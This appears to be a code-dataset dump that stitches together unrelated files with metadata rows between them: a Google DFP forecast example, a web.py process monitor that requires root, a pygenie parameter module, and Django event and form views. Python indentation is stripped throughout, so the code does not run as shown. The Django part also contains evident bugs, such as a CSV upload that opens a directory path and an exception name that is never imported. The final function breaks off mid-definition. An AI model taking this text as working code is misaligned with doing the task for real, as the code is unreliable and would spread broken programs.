# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets an availability forecast for an existing line item.
To determine which line items exist, run get_all_line_items.py.
"""
# Import appropriate modules from the client library.
from googleads import dfp
# Set the line item to get a forecast for.
LINE_ITEM_ID = 'INSERT_LINE_ITEM_ID_HERE'
def main(client, line_item_id):
# Initialize appropriate service.
forecast_service = client.GetService('ForecastService', version='v201508')
# Set forecasting options.
forecast_options = {
'includeContendingLineItems': True,
'includeTargetingCriteriaBreakdown': True,
}
# Get forecast for line item.
forecast = forecast_service.getAvailabilityForecastById(
line_item_id, forecast_options)
matched = long(forecast['matchedUnits'])
available_percent = (((long(forecast['availableUnits'])/
(matched * 1.0)) * 100)
if matched != 0 else 0)
contending_line_items = ([] if 'contendingLineItems' not in forecast
else forecast['contendingLineItems'])
# Display results.
print '%s %s matched.' % (matched, forecast['unitType'].lower())
print '%s%% %s available.' % (available_percent, forecast['unitType'].lower())
print '%d contending line items.' % len(contending_line_items)
if 'possibleUnits' in forecast and matched:
possible_percent = (long(forecast['possibleUnits'])/(matched * 1.0)) * 100
print '%s%% %s possible' % (possible_percent, forecast['unitType'].lower())
if __name__ == '__main__':
# Initialize client object.
dfp_client = dfp.DfpClient.LoadFromStorage()
main(dfp_client, LINE_ITEM_ID)
| apache-2.0 | 3,155,967,955,401,109,500 | 35.063492 | 80 | 0.698063 | false |
mavjs/ProcAnalyst | procanalyst.py | 1 | 3109 | #!/usr/bin/env python
import os
import sys
import web
import psutil
from convert import HumanReadable
from configparse import ParseConfig
urls = (
'/', 'Index',
'/proc', 'ProcList',
'/favicon.ico', 'favicon',
)
class favicon(object):
"""
On base web.py process, the request for favicon.ico 404s, this make it
displayable and thus avoid the 404s.
"""
def GET(self):
raise web.redirect('static/favicon.ico')
class ProcList(object):
"""
Class to render the ProcList a.k.a /proc, which displays list of processes.
"""
def GET(self):
# https://groups.google.com/forum/?fromgroups=#!topic/webpy/QWOJBZMyhI4
render = web.template.render('templates/')
proclist = psutil.get_process_list()
ostype = os.name
return render.proclist(proclist, ostype)
class Index(object):
"""
Class to render the index a.k.a / path of the web server
"""
def __init__(self):
self.inet_dev, self.convert = ParseConfig().getmiscvar()
def GET(self):
render = web.template.render('templates/')
device = self.inet_dev # change this to reflect your network device
cpus = psutil.NUM_CPUS
if self.convert:
up = HumanReadable(psutil.network_io_counters(pernic=True)[device].bytes_sent).bytes2human()
down = HumanReadable(psutil.network_io_counters(pernic=True)[device].bytes_recv).bytes2human()
phymem = HumanReadable(psutil.TOTAL_PHYMEM).bytes2human()
else:
up = psutil.network_io_counters(pernic=True)[device].bytes_sent
down = psutil.network_io_counters(pernic=True)[device].bytes_recv
phymem = psutil.TOTAL_PHYMEM
disks_name = self.get_disk_usage().keys()
disks = self.get_disk_usage()
return render.index(up, down, cpus, phymem, disks, disks_name)
def get_disk_usage(self):
disk_usages = {}
for i in psutil.disk_partitions():
try:
usage = psutil.disk_usage(i.mountpoint)
if self.convert:
usage_total = HumanReadable(usage.total).bytes2human()
usage_used = HumanReadable(usage.used).bytes2human()
else:
usage_total = usage.total
usage_used = usage.used
except OSError:
pass
disk_usages[i.mountpoint] = {'total':usage_total,'used':usage_used,'fstype':i.fstype}
return disk_usages
if os.name == 'posix':
if not os.getuid() == 0:
sys.exit('\n[WARNING!] This needs to run as root/administrator! [WARNING!]\n')
else:
if __name__ == "__main__":
app = web.application(urls, globals())
app.run()
elif os.name == 'nt':
import ctypes
if not ctypes.windll.shell32.IsUserAnAdmin() == 1:
sys.exit('\n[WARNING!] This needs to run as root/administrator! [WARNING!]\n')
else:
if __name__ == "__main__":
app = web.application(urls, globals())
app.run()
| gpl-2.0 | -4,700,249,065,902,330,000 | 34.329545 | 106 | 0.588614 | false |
jbzdak/pygenie | pygenie/lib/params/_par_type.py | 1 | 6047 | from _operator import itemgetter
import collections
import enum
import re
from pygenie import init;
from pygenie.init import SAD_LIB
from pygenie.lib.errors import GenieDatetimeConversionError
init._make_initialized()
from pygenie.lib.params._data import par_map, text_lengths, absolute_time_params
class ParamType(object):
def get_field_size_in_bytes(self):
raise NotImplementedError()
def from_python(self, obj=None):
raise NotImplementedError()
def to_python(self, pointer):
raise NotImplementedError()
class UnsupportedParam(ParamType):
def __init__(self, param_type):
self.param_type = param_type
def get_field_size_in_bytes(self):
raise NotImplementedError("Unsupported (yet) param type '{}'".format(self.param_type))
def from_python(self, obj=None):
raise NotImplementedError("Unsupported (yet) param type '{}'".format(self.param_type))
def to_python(self, pointer):
raise NotImplementedError("Unsupported (yet) param type '{}'".format(self.param_type))
class UnknownLengthTextParam(ParamType):
def __init__(self, param_name):
self.param_name = param_name
def get_field_size_in_bytes(self):
raise NotImplementedError("Text parameter {} has unknown length, and can't be used".format(self.param_name))
def from_python(self, obj=None):
raise NotImplementedError("Text parameter {} has unknown length, and can't be used".format(self.param_name))
def to_python(self, pointer):
raise NotImplementedError("Text parameter {} has unknown length, and can't be used".format(self.param_name))
class FFIParamType(ParamType):
def __init__(self, ffi_type, default, object_size):
super().__init__()
self.ffi_type = ffi_type
self.default = default
self.object_size = object_size
def get_field_size_in_bytes(self):
return self.object_size
def from_python(self, obj=None):
if obj is None:
obj=self.default
ptr = init.ffi.new("{}*".format(self.ffi_type))
ptr[0] = obj
return ptr
def to_python(self, pointer):
return pointer[0]
class TimeDeltaParam(FFIParamType):
def __init__(self):
super().__init__('double', 0.0, 8)
class FFITextParameter(ParamType):
def __init__(self, text_len):
super().__init__()
self.text_len = text_len-1
self.string_len = text_len
self.default = b'-'*self.text_len
def from_python(self, obj=None):
if obj is None:
obj = self.default
if len(obj) > self.text_len:
raise ValueError("Value of parmeter is longer than field length")
obj = obj + b'\0' * (self.string_len - len(obj))
value = init.ffi.new('char[]', self.string_len)
value[0:self.string_len] = obj
return value
def get_field_size_in_bytes(self):
return self.string_len
def to_python(self, pointer):
return init.ffi.string(pointer)
def create_char_parameter_type(name):
length = text_lengths[name[2:]]
if length is None:
return UnknownLengthTextParam(name)
else:
return FFITextParameter(length)
PARAM_TYPE_MAPPER = collections.defaultdict(lambda: lambda x: ParamType())
PARAM_TYPE_MAPPER.update({
"L": lambda x: FFIParamType('LONG', 0, 4),
"X": lambda x: TimeDeltaParam(),
"F": lambda x: FFIParamType('float', 0.0, 4),
"T": create_char_parameter_type})
Parameter = collections.namedtuple('Parameter', ['name', 'id', 'type'])
def _parameter_type_for_name( param_name):
return PARAM_TYPE_MAPPER[param_name[0].upper()](param_name)
class SerialParam(object):
@classmethod
def _create_from_matches(cls, matches):
def par_from_match(match):
return Parameter(
match[0], match[1], _parameter_type_for_name(match[0])
)
return SerialParam(
par_from_match(matches[0]),
{m[2]:par_from_match(m) for m in matches}
)
def __init__(self, first_param, param_map):
self.name, self.id, self.type = first_param
self.param_map = param_map
def __getitem__(self, item):
return self.param_map[item]
def __len__(self):
return len(self.param_map)
def __iter__(self):
return iter((self.param_map[ii] for ii in sorted(self.param_map.keys())))
class ParamGenerator(object):
def __init__(self):
super().__init__()
self.__serial_params_cache = {}
def param_set(self):
return par_map.keys()
def __getattr__(self, item):
try:
param_id = par_map[item]
except KeyError:
raise AttributeError(item)
par_type = _parameter_type_for_name(item)
p = Parameter(item, param_id, par_type)
setattr(self, item, p)
return p
def __getitem__(self, item):
return self.__getattr__(item)
def get_serial_parametr(self, item_pattern):
if item_pattern in self.__serial_params_cache:
return self.__serial_params_cache[item_pattern]
search_format = re.compile(item_pattern.format(r"(?P<param_idx>\d+)"))
matches = []
for name, value in par_map.items():
m = re.match(search_format, name)
if m:
matches.append((name, value, int(m.group('param_idx'))))
matches = sorted(matches, key=itemgetter(2))
return SerialParam._create_from_matches(matches)
def get_composite_parameter(self, param_names):
return SerialParam._create_from_matches(
[(param, par_map[param], ii) for ii, param in enumerate(param_names) ]
)
PARAM_GENERATOR = ParamGenerator()
class ParamAliasBase(enum.Enum):
@property
def param(self):
return getattr(PARAM_GENERATOR, self.value)
def __getitem__(self, item):
return self.value[item]
def __len__(self):
return len(self.value)
def __iter__(self):
return iter(self.value) | lgpl-3.0 | -6,578,331,627,380,840,000 | 28.076923 | 116 | 0.621134 | false |
mansonul/events | events/views.py | 1 | 50067 | import logging
import json
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponse, QueryDict, HttpResponseRedirect
from django.core.urlresolvers import reverse, reverse_lazy
from django.views.generic import (
CreateView,
DetailView,
ListView,
UpdateView,
DeleteView)
from django.shortcuts import get_object_or_404
from project.users.models import User
from .form_importers import get_form_impoter_plugin_urls
from .forms import (
EventForm,
EmailForm,
LocationForm,
FormEntryForm,
FormElementEntryFormSet,
)
from .models import (
Event,
EmailApp,
Location,
FormEntry,
FormElementEntry,
FormHandlerEntry)
from django.http import JsonResponse
# ********* New ****************
from django.contrib.auth.decorators import login_required, permission_required
# from .decorators import permissions_required, SATISFY_ALL, SATISFY_ANY
from django.contrib import messages
from django.shortcuts import redirect, render
from django.db import models, IntegrityError
from django.core.exceptions import ObjectDoesNotExist
from django.http import Http404
from .base import (
fire_form_callbacks,
run_form_handlers,
form_element_plugin_registry,
form_handler_plugin_registry,
submit_plugin_form_data,
get_theme,
)
from .constants import (
CALLBACK_BEFORE_FORM_VALIDATION,
CALLBACK_FORM_VALID_BEFORE_SUBMIT_PLUGIN_FORM_DATA,
CALLBACK_FORM_VALID,
CALLBACK_FORM_VALID_AFTER_FORM_HANDLERS,
CALLBACK_FORM_INVALID
)
from .dynamic import assemble_form_class
from .settings import GET_PARAM_INITIAL_DATA, DEBUG
from .utils import (
append_edit_and_delete_links_to_field,
get_user_form_element_plugins_grouped,
get_user_form_field_plugin_uids,
get_user_form_handler_plugins,
get_user_form_handler_plugin_uids,
)
# class EventList(LoginRequiredMixin, ListView):
class EventList(ListView):
"""Organiser can view a list of his events"""
model = Event
def get_context_data(self, **kwargs):
context = super(EventList, self).get_context_data(**kwargs)
context['events'] = Event.objects.filter(user=self.request.user)
# context['events'] = Event.objects.all()
# context['quota'] = self.request.user.event_value
return context
class EventDetail(DetailView):
"""Organiser can view a list of his events"""
model = Event
template_name = 'events/event_detail.html'
def get_context_data(self, **kwargs):
context = super(EventDetail, self).get_context_data(**kwargs)
context['locations'] = Location.objects.filter(
event__title=self.object.title) # .filter(
# event__user=self.request.user)
# context['collection'] = FormElementEntry.objects.filter(
# form_entry_id=self.object.pk)
# context['options'] = assemble_form_class(
# self.object,
# )
# context['collection_quota'] = self.request.user.collection_value
return context
class EventDelete(LoginRequiredMixin, DeleteView):
"""Organiser can delete the Event"""
model = Event
template_name = 'events/event_delete.html'
form_class = EventForm
def get_success_url(self):
return reverse('events:list')
class EventCreate(LoginRequiredMixin, CreateView):
"""Organiser can create Event in frontend"""
model = Event
form_class = EventForm
def get_template_names(self):
check_object = Event.objects.filter(
user=self.request.user
).order_by('-title').exists()
check_events_number = Event.objects.filter(
user=self.request.user).count()
if check_object is False:
return ['events/event_form.html']
elif check_object is True and \
check_events_number < \
self.request.user.event_value:
return ['events/event_form.html']
else:
return ['events/event_list.html']
def get_context_data(self, **kwargs):
context = super(EventCreate, self).get_context_data(**kwargs)
context['events'] = Event.objects.filter(user=self.request.user)
return context
def form_valid(self, form):
check_events_number = Event.objects.filter(
user=self.request.user).count()
organiser = form.save(commit=False)
if check_events_number < self.request.user.event_value:
organiser.user = User.objects.get(username=self.request.user)
organiser.save()
return HttpResponseRedirect(
reverse('events:l-create', args=(organiser.pk,)))
else:
return HttpResponseRedirect(
reverse('events:list'))
class EventUpdate(LoginRequiredMixin, UpdateView):
model = Event
form_class = EventForm
template_name = 'events/event_form.html'
success_url = reverse_lazy('events:list')
class LocationCreate(LoginRequiredMixin, CreateView):
"""Organiser can create Location"""
template_name = 'events/location_form.html'
form_class = LocationForm
model = Location
def form_valid(self, form):
# Pass the Foreign Key to the form
form.instance.event = get_object_or_404(
Event, pk=self.kwargs.get('pk'))
# Verify the user quota against default quota
event_location_quota = Event.objects.filter(
pk=self.kwargs['pk']).values_list(
'location_quota', flat=True)[0]
user_locations_count = Location.objects.filter(
event__pk=self.kwargs['pk']).filter(
event__user=self.request.user).count()
location = form.save(commit=False)
# Save form only if user passes condition
if user_locations_count < event_location_quota:
location.save()
return super(LocationCreate, self).form_valid(form)
# Else redirect him to the Events list
else:
return HttpResponseRedirect(
reverse('events:list'))
# Pass the Event pk to the collection
def get_success_url(self, **kwargs):
return reverse_lazy('events:fobi.edit_form_entry',
kwargs={'form_entry_id': self.kwargs['pk']})
class LocationDelete(LoginRequiredMixin, DeleteView):
"""Organiser can delete the Location"""
model = Location
template_name = 'events/location_delete.html'
form_class = LocationForm
# After delete go the event
def get_success_url(self, **kwargs):
pk = Location.objects.filter(
pk=self.kwargs['pk']).values_list(
'event__pk', flat=True)[0]
return reverse_lazy('events:detail',
kwargs={'pk': pk})
class LocationUpdate(LoginRequiredMixin, UpdateView):
model = Location
form_class = LocationForm
# After update go the event
def get_success_url(self, **kwargs):
pk = Location.objects.filter(
pk=self.kwargs['pk']).values_list('event__pk', flat=True)[0]
return reverse_lazy('events:detail',
kwargs={'pk': pk})
class AjaxableResponseMixin(object):
"""
Mixin to add AJAX support to a form.
Must be used with an object-based FormView (e.g. CreateView)
"""
def form_invalid(self, form):
response = super(AjaxableResponseMixin, self).form_invalid(form)
if self.request.is_ajax():
return JsonResponse(form.errors, status=400)
else:
return response
def form_valid(self, form):
# We make sure to call the parent's form_valid() method because
# it might do some processing (in the case of CreateView, it will
# call form.save() for example).
response = super(AjaxableResponseMixin, self).form_valid(form)
if self.request.is_ajax():
data = {
'pk': self.object.pk,
'name': self.object.name,
'email': self.object.email,
}
return JsonResponse(data)
else:
return response
# from tablib import Dataset
class EmailCreate(LoginRequiredMixin, AjaxableResponseMixin, CreateView):
"""Organiser can create Location"""
template_name = 'events/email_form.html'
form_class = EmailForm
model = EmailApp
def form_valid(self, form):
# Pass the Foreign Key to the form
form.instance.event = get_object_or_404(
Event, pk=self.kwargs.get('pk'))
# Verify the user quota against default quota
event_email_quota = Event.objects.filter(
pk=self.kwargs['pk']).values_list(
'email_quota', flat=True)[0]
user_email_count = EmailApp.objects.filter(
event__pk=self.kwargs['pk']).filter(
event__user=self.request.user).count()
email = form.save(commit=False)
# Save form only if user passes condition
if user_email_count < event_email_quota:
email.save()
return super().form_valid(form)
# Else redirect him to the Events list
else:
return HttpResponseRedirect(
reverse('events:list'))
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['emails'] = EmailApp.objects.filter(
event__pk=self.kwargs.get('pk')).order_by('-pk')
context['event_email_quota'] = Event.objects.filter(
pk=self.kwargs['pk']).values_list(
'email_quota', flat=True)[0]
return context
def get_success_url(self, **kwargs):
return reverse_lazy('events:list')
# class InviteeURL(DetailView):
# model = Event
# template_name = 'invitee_url.html'
import os # noqa
import csv # noqa
def upload_csv(request):
if not request.user.is_authenticated:
return redirect("home")
csv_path = os.path.dirname(os.path.abspath(__file__))
try:
with open(csv_path) as f:
reader = csv.reader(f)
for row in reader:
event_obj, created = Event.objects.filter(
pk=str(row[0]),
)
product_obj, created = EmailApp.objects.get_or_create(
event=event_obj,
name=str(row[1]),
email=str(row[2]),
)
success = "Added to database"
context = {"success": success}
except csv.Error as e:
print(e)
context = {'error': e}
template = "events/email_form.html"
return render(request, template, context)
# @login_required
def delete_post(request):
if request.method == 'DELETE':
post = EmailApp.objects.get(
pk=int(QueryDict(request.body).get('postpk')))
post.delete()
response_data = {}
response_data['msg'] = 'Post was deleted.'
return HttpResponse(
json.dumps(response_data),
content_type="application/json"
)
else:
return HttpResponse(
json.dumps({"nothing to see": "this isn't happening"}),
content_type="application/json"
)
def _delete_plugin_entry(request,
entry_id,
entry_model_cls,
get_user_plugin_uids_func,
message,
html_anchor):
"""Abstract delete entry.
:param django.http.HttpRequest request:
:param int entry_id:
:param fobi.models.AbstractPluginEntry entry_model_cls: Subclass of
``fobi.models.AbstractPluginEntry``.
:param callable get_user_plugin_uids_func:
:param str message:
:return django.http.HttpResponse:
"""
try:
obj = entry_model_cls._default_manager \
.select_related('form_entry') \
.get(pk=entry_id,
form_entry__user__pk=request.user.pk)
except ObjectDoesNotExist:
raise Http404(("{0} not found.").format(
entry_model_cls._meta.verbose_name)
)
form_entry = obj.form_entry
plugin = obj.get_plugin(request=request)
plugin.request = request
plugin._delete_plugin_data()
obj.delete()
messages.info(request, message.format(plugin.name))
redirect_url = reverse(
'events:fobi.edit_form_entry', kwargs={'form_entry_id': form_entry.pk}
)
return redirect("{0}{1}".format(redirect_url, html_anchor))
# *****************************************************************************
# **************************** Add form handler entry *************************
# *****************************************************************************
@login_required
# @permission_required('events.add_formhandlerentry')
def add_form_handler_entry(request,
form_entry_id,
form_handler_plugin_uid,
theme=None,
template_name=None):
"""Add form handler entry.
:param django.http.HttpRequest request:
:param int form_entry_id:
:param int form_handler_plugin_uid:
:param fobi.base.BaseTheme theme: Theme instance.
:param string template_name:
:return django.http.HttpResponse:
"""
print('From handler', form_entry_id)
try:
form_entry = Event._default_manager.get(pk=form_entry_id)
except ObjectDoesNotExist:
raise Http404("Form entry not found.")
user_form_handler_plugin_uids = get_user_form_handler_plugin_uids(
request.user
)
print(user_form_handler_plugin_uids)
if form_handler_plugin_uid not in user_form_handler_plugin_uids:
raise Http404("Plugin does not exist or you are not allowed "
"to use this plugin!")
form_handler_plugin_cls = form_handler_plugin_registry.get(
form_handler_plugin_uid
)
# Check if we deal with form handler plugin that is only allowed to be
# used once. In that case, check if it has been used already in the current
# form entry.
if not form_handler_plugin_cls.allow_multiple:
times_used = FormHandlerEntry._default_manager \
.filter(form_entry__id=form_entry_id,
plugin_uid=form_handler_plugin_cls.uid) \
.count()
if times_used > 0:
raise Http404(
("The {0} plugin can be used only once in a "
"form.").format(form_handler_plugin_cls.name)
)
form_handler_plugin = form_handler_plugin_cls(user=request.user)
form_handler_plugin.request = request
form_handler_plugin_form_cls = form_handler_plugin.get_form()
form = None
obj = FormHandlerEntry()
obj.form_entry = form_entry
obj.plugin_uid = form_handler_plugin_uid
obj.user = request.user
save_object = False
if not form_handler_plugin_form_cls:
save_object = True
elif request.method == 'POST':
form = form_handler_plugin.get_initialised_create_form_or_404(
data=request.POST,
files=request.FILES
)
if form.is_valid():
# Saving the plugin form data.
form.save_plugin_data(request=request)
# Getting the plugin data.
obj.plugin_data = form.get_plugin_data(request=request)
save_object = True
else:
form = form_handler_plugin.get_initialised_create_form_or_404()
if save_object:
# Save the object.
obj.save()
messages.info(
request,
('The form handler plugin "{0}" was added '
'successfully.').format(form_handler_plugin.name)
)
# return redirect(
# "{0}?active_tab=tab-form-handlers".format(
# reverse(
# 'fobi.edit_form_entry',
# kwargs={'form_entry_id': form_entry_id}
# )
# )
# )
return redirect(reverse('events:list'))
context = {
'form': form,
'form_entry': form_entry,
'form_handler_plugin': form_handler_plugin,
}
# If given, pass to the template (and override the value set by
# the context processor.
if theme:
context.update({'fobi_theme': theme})
if not template_name:
if not theme:
theme = get_theme(request=request, as_instance=True)
template_name = theme.add_form_handler_entry_template
return render(request, template_name, context)
# *****************************************************************************
# **************************** Edit form handler entry ************************
# *****************************************************************************
# @login_required
# @permission_required('events.change_formhandlerentry')
def edit_form_handler_entry(request,
form_handler_entry_id,
theme=None,
template_name=None):
"""Edit form handler entry.
:param django.http.HttpRequest request:
:param int form_handler_entry_id:
:param fobi.base.BaseTheme theme: Theme instance.
:param string template_name:
:return django.http.HttpResponse:
"""
try:
obj = FormHandlerEntry._default_manager \
.select_related('form_entry') \
.get(pk=form_handler_entry_id)
except ObjectDoesNotExist:
raise Http404("Form handler entry not found.")
form_entry = obj.form_entry
form_handler_plugin = obj.get_plugin(request=request)
form_handler_plugin.request = request
FormHandlerPluginForm = form_handler_plugin.get_form()
form = None
if not FormHandlerPluginForm:
messages.info(
request,
('The form handler plugin "{0}" is not '
'configurable!').format(form_handler_plugin.name)
)
return redirect('events:fobi.edit_form_entry',
form_entry_id=form_entry.pk)
elif request.method == 'POST':
form = form_handler_plugin.get_initialised_edit_form_or_404(
data=request.POST,
files=request.FILES
)
if form.is_valid():
# Saving the plugin form data.
form.save_plugin_data(request=request)
# Getting the plugin data.
obj.plugin_data = form.get_plugin_data(request=request)
# Save the object.
obj.save()
messages.info(
request,
('The form handler plugin "{0}" was edited '
'successfully.').format(form_handler_plugin.name)
)
return redirect('events:fobi.edit_form_entry',
form_entry_id=form_entry.pk)
else:
form = form_handler_plugin.get_initialised_edit_form_or_404()
context = {
'form': form,
'form_entry': form_entry,
'form_handler_plugin': form_handler_plugin,
}
# If given, pass to the template (and override the value set by
# the context processor.
if theme:
context.update({'fobi_theme': theme})
if not template_name:
if not theme:
theme = get_theme(request=request, as_instance=True)
template_name = theme.edit_form_handler_entry_template
return render(request, template_name, context)
# *****************************************************************************
# **************************** Delete form handler entry **********************
# *****************************************************************************
# @login_required
# @permission_required('events.delete_formhandlerentry')
def delete_form_handler_entry(request, form_handler_entry_id):
"""Delete form handler entry.
:param django.http.HttpRequest request:
:param int form_handler_entry_id:
:return django.http.HttpResponse:
"""
return _delete_plugin_entry(
request=request,
entry_id=form_handler_entry_id,
entry_model_cls=FormHandlerEntry,
get_user_plugin_uids_func=get_user_form_handler_plugin_uids,
message='The form handler plugin "{0}" '
'was deleted successfully.',
html_anchor='?active_tab=tab-form-handlers'
)
# *****************************************************************************
# **************************** Create form entry ******************************
# *****************************************************************************
@login_required
def edit_form_entry(request, form_entry_id, theme=None, template_name=None):
"""Edit form entry.
:param django.http.HttpRequest request:
:param int form_entry_id:
:param fobi.base.BaseTheme theme: Theme instance.
:param str template_name:
:return django.http.HttpResponse:
"""
try:
form_entry = Event._default_manager \
.select_related('user') \
.prefetch_related('formelemententry_set') \
.get(pk=form_entry_id, user__pk=request.user.pk)
except ObjectDoesNotExist as err:
raise Http404("Form entry not found.")
if request.method == 'POST':
# The form entry form (does not contain form elements)
form = FormEntryForm(request.POST, request.FILES, instance=form_entry,
request=request)
# This is where we save ordering if it has been changed.
# The `FormElementEntryFormSet` contain ids and positions only.
if 'ordering' in request.POST:
form_element_entry_formset = FormElementEntryFormSet(
request.POST,
request.FILES,
queryset=form_entry.formelemententry_set.all(),
# prefix = 'form_element'
)
# If form elements aren't properly made (developers's fault)
# there might be problems with saving the ordering - likely
# in case of hidden elements only. Thus, we want to avoid
# errors here.
try:
if form_element_entry_formset.is_valid():
form_element_entry_formset.save()
messages.info(
request,
"Elements ordering edited successfully."
)
return redirect(
reverse('events:fobi.edit_form_entry',
kwargs={'form_entry_id': form_entry_id})
)
except MultiValueDictKeyError as err: # noqa
messages.error(
request,
"Errors occurred while trying to change the "
"elements ordering!")
return redirect(
reverse('events:fobi.edit_form_entry',
kwargs={'form_entry_id': form_entry_id})
)
else:
form_element_entry_formset = FormElementEntryFormSet(
queryset=form_entry.formelemententry_set.all(),
# prefix='form_element'
)
if form.is_valid():
obj = form.save(commit=False)
obj.user = request.user
try:
obj.save()
messages.info(
request,
('Form {0} was edited successfully.').format(
form_entry.name
)
)
return redirect(
reverse(
'events:fobi.edit_form_entry',
kwargs={'form_entry_id': form_entry_id}
)
)
except IntegrityError as err:
messages.info(
request,
(
'Errors occurred while saving the form: {0}.'
).format(str(err))
)
else:
# The form entry form (does not contain form elements)
form = FormEntryForm(instance=form_entry, request=request)
form_element_entry_formset = FormElementEntryFormSet(
queryset=form_entry.formelemententry_set.all(),
# prefix='form_element'
)
# In case of success, we don't need this (since redirect would happen).
# Thus, fetch only if needed.
form_elements = form_entry.formelemententry_set.all()
form_handlers = form_entry.formhandlerentry_set.all()[:]
used_form_handler_uids = [form_handler.plugin_uid
for form_handler
in form_handlers]
# The code below (two lines below) is not really used at the moment,
# thus - comment out, but do not remove, as we might need it later on.
# all_form_entries = FormEntry._default_manager \
# .only('id', 'name', 'slug') \
# .filter(user__pk=request.user.pk)
# List of form element plugins allowed to user
user_form_element_plugins = get_user_form_element_plugins_grouped(
request.user
)
# List of form handler plugins allowed to user
user_form_handler_plugins = get_user_form_handler_plugins(
request.user,
exclude_used_singles=True,
used_form_handler_plugin_uids=used_form_handler_uids
)
# Assembling the form for preview
form_cls = assemble_form_class(
form_entry,
origin='edit_form_entry',
origin_kwargs_update_func=append_edit_and_delete_links_to_field,
request=request
)
assembled_form = form_cls()
# print('assembled_form', assembled_form)
# In debug mode, try to identify possible problems.
if DEBUG:
assembled_form.as_p()
else:
try:
assembled_form.as_p()
except Exception as err:
logger.error(err)
# If no theme provided, pick a default one.
if not theme:
theme = get_theme(request=request, as_instance=True)
theme.collect_plugin_media(form_elements)
# Verify the user quota against default quota
event_location_quota = Event.objects.filter(
pk=form_entry.pk).values_list(
'collection_quota', flat=True)[0]
user_locations_count = FormEntry.objects.filter(
event__pk=form_entry.pk).filter(
event__user=request.user).count()
context = {
'form': form,
'form_entry': form_entry,
'form_elements': form_elements,
'form_handlers': form_handlers,
# 'all_form_entries': all_form_entries,
'user_form_element_plugins': user_form_element_plugins,
'user_form_handler_plugins': user_form_handler_plugins,
'assembled_form': assembled_form,
'form_element_entry_formset': form_element_entry_formset,
'fobi_theme': theme,
'collection_quota': request.user.collection_value,
'user_locations_count': user_locations_count,
'event_location_quota': event_location_quota,
}
# if not template_name:
# template_name = theme.edit_form_entry_template
template_name = 'bootstrap3/edit_form_view.html'
return render(request, template_name, context)
logger = logging.getLogger(__name__)
@login_required
def dashboard(request, theme=None, template_name=None):
"""Dashboard.
:param django.http.HttpRequest request:
:param fobi.base.BaseTheme theme: Theme instance.
:param string template_name:
:return django.http.HttpResponse:
"""
form_entries = Event._default_manager \
.filter(user__pk=request.user.pk) \
.select_related('user')
context = {
'form_entries': form_entries,
'form_importers': get_form_impoter_plugin_urls(),
}
# If given, pass to the template (and override the value set by
# the context processor.
if theme:
context.update({'fobi_theme': theme})
if not template_name:
theme = get_theme(request=request, as_instance=True)
template_name = theme.dashboard_template
return render(request, template_name, context)
class EventDetailInvitati(LoginRequiredMixin, DetailView):
"""Organiser can view a list of his events"""
model = EmailApp
template_name = 'events/event_detail_invitati.html'
slug_field = 'secret'
slug_url_kwarg = 'secret'
def get_context_data(self, **kwargs):
da = self.object
print(da)
context = super().get_context_data(**kwargs)
context['event'] = self.object.event
context['locations'] = Location.objects.filter(
event__title=self.object.event)
context['anas'] = FormElementEntry.objects.filter(
form_entry_id=self.object.pk)
print('Form: ', context['anas'])
context['collections'] = assemble_form_class(
self.object.event,
)
context['das'] = EmailApp.objects.values_list('event__title', flat=True)[6]
print('das: ', context['das'])
# context['collections'] = self.get_form()
print('collections: ', context['collections'])
return context
def view_form_entry(
request,
# form_entry_slug,
secret,
theme=None,
template_name=None):
"""View created form.
:param django.http.HttpRequest request:
:param string form_entry_slug:
:param fobi.base.BaseTheme theme: Theme instance.
:param string template_name:
:return django.http.HttpResponse:
"""
secrets = EmailApp.objects.filter(secret=secret)
try:
# kwargs = {'slug': form_entry_slug}
kwargs = {'emailapp': secrets}
if not request.user.is_authenticated():
kwargs.update({'is_public': True})
form_entry = Event._default_manager.select_related('user') \
.get(**kwargs)
except ObjectDoesNotExist as err:
raise Http404("Form entry not found.")
form_element_entries = form_entry.formelemententry_set.all()[:]
# This is where the most of the magic happens. Our form is being built
# dynamically.
form_cls = assemble_form_class(
form_entry,
form_element_entries=form_element_entries,
request=request
)
if request.method == 'POST':
form = form_cls(request.POST, request.FILES)
# Fire pre form validation callbacks
fire_form_callbacks(form_entry=form_entry,
request=request, form=form,
stage=CALLBACK_BEFORE_FORM_VALIDATION)
if form.is_valid():
# Fire form valid callbacks, before handling submitted plugin
# form data.
form = fire_form_callbacks(
form_entry=form_entry,
request=request,
form=form,
stage=CALLBACK_FORM_VALID_BEFORE_SUBMIT_PLUGIN_FORM_DATA
)
# Fire plugin processors
form = submit_plugin_form_data(
form_entry=form_entry,
invitee=secrets,
request=request,
form=form
)
# Fire form valid callbacks
form = fire_form_callbacks(form_entry=form_entry,
request=request, form=form,
stage=CALLBACK_FORM_VALID)
# Run all handlers
handler_responses, handler_errors = run_form_handlers(
form_entry=form_entry,
invitee=secret,
request=request,
form=form,
form_element_entries=form_element_entries
)
# Warning that not everything went ok.
if handler_errors:
for handler_error in handler_errors:
messages.warning(
request,
("Error occurred: {0}.").format(handler_error)
)
# Fire post handler callbacks
fire_form_callbacks(
form_entry=form_entry,
request=request,
form=form,
stage=CALLBACK_FORM_VALID_AFTER_FORM_HANDLERS
)
messages.info(
request,
("Form {0} was submitted successfully.").format(
form_entry.title
)
)
return redirect(
reverse('events:fobi.form_entry_submitted',
args=[form_entry.slug])
)
else:
# Fire post form validation callbacks
fire_form_callbacks(form_entry=form_entry, request=request,
form=form, stage=CALLBACK_FORM_INVALID)
else:
# Providing initial form data by feeding entire GET dictionary
# to the form, if ``GET_PARAM_INITIAL_DATA`` is present in the
# GET.
kwargs = {}
if GET_PARAM_INITIAL_DATA in request.GET:
kwargs = {'initial': request.GET}
form = form_cls(**kwargs)
# In debug mode, try to identify possible problems.
if DEBUG:
form.as_p()
else:
try:
form.as_p()
except Exception as err:
logger.error(err)
theme = get_theme(request=request, as_instance=True)
theme.collect_plugin_media(form_element_entries)
context = {
'form': form,
'form_entry': form_entry,
'fobi_theme': theme,
'fobi_form_title': form_entry.title,
}
if not template_name:
# template_name = theme.view_form_entry_template
template_name = 'events/event_detail_invitati.html'
return render(request, template_name, context)
def view_form_entry_public(
request,
form_entry_slug,
# secret,
theme=None,
template_name=None):
